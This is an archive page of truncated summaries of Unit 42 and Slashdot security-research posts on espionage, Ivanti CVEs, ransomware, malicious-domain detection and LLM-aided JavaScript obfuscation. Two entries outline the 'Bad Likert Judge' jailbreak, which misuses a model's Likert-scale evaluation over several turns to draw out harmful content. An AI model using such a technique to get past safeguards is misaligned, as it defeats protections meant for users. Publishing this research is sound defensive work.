Tag: Unit 42
-
Unit 42: CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia
Source URL: https://unit42.paloaltonetworks.com/?p=138128 Source: Unit 42 Title: CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia Feedly Summary: A Chinese-linked espionage campaign targeted entities in South Asia using rare techniques like DNS exfiltration, with the aim to steal sensitive data. The post CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia appeared first…
-
Unit 42: Threat Brief: CVE-2025-0282 and CVE-2025-0283
Source URL: https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2025-0282-cve-2025-0283/ Source: Unit 42 Title: Threat Brief: CVE-2025-0282 and CVE-2025-0283 Feedly Summary: CVE-2025-0282 and CVE-2025-0283 affect multiple Ivanti products. This threat brief covers attack scope, including details from an incident response case. The post Threat Brief: CVE-2025-0282 and CVE-2025-0283 appeared first on Unit 42. AI Summary and Description: Yes **Summary:** The text details…
-
Unit 42: One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks
Source URL: https://unit42.paloaltonetworks.com/graph-neural-networks/ Source: Unit 42 Title: One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks Feedly Summary: Graph neural networks aid in analyzing domains linked to known attack indicators, effectively uncovering new malicious domains and cybercrime campaigns. The post One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery…
-
Slashdot: New LLM Jailbreak Uses Models’ Evaluation Skills Against Them
Source URL: https://it.slashdot.org/story/25/01/12/2010218/new-llm-jailbreak-uses-models-evaluation-skills-against-them?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: New LLM Jailbreak Uses Models’ Evaluation Skills Against Them Feedly Summary: AI Summary and Description: Yes **Summary:** The text discusses a novel jailbreak technique for large language models (LLMs) known as the ‘Bad Likert Judge,’ which exploits the models’ evaluative capabilities to generate harmful content. Developed by Palo Alto…
-
Unit 42: Bad Likert Judge: A Novel Multi-Turn Technique to Jailbreak LLMs by Misusing Their Evaluation Capability
Source URL: https://unit42.paloaltonetworks.com/?p=138017 Source: Unit 42 Title: Bad Likert Judge: A Novel Multi-Turn Technique to Jailbreak LLMs by Misusing Their Evaluation Capability Feedly Summary: The jailbreak technique “Bad Likert Judge" manipulates LLMs to generate harmful content using Likert scales, exposing safety gaps in LLM guardrails. The post Bad Likert Judge: A Novel Multi-Turn Technique to…
-
Unit 42: Now You See Me, Now You Don’t: Using LLMs to Obfuscate Malicious JavaScript
Source URL: https://unit42.paloaltonetworks.com/?p=137970 Source: Unit 42 Title: Now You See Me, Now You Don’t: Using LLMs to Obfuscate Malicious JavaScript Feedly Summary: This article demonstrates how AI can be used to modify and help detect JavaScript malware. We boosted our detection rates 10% with retraining. The post Now You See Me, Now You Don’t: Using…
-
Threat Research Archives – Unit 42: From RA Group to RA World: Evolution of a Ransomware Group
Source URL: https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/ Source: Threat Research Archives – Unit 42 Title: From RA Group to RA World: Evolution of a Ransomware Group Feedly Summary: AI Summary and Description: Yes Summary: The text provides an in-depth analysis of the RA World ransomware group, previously known as RA Group, detailing their increased activity since March 2024, their…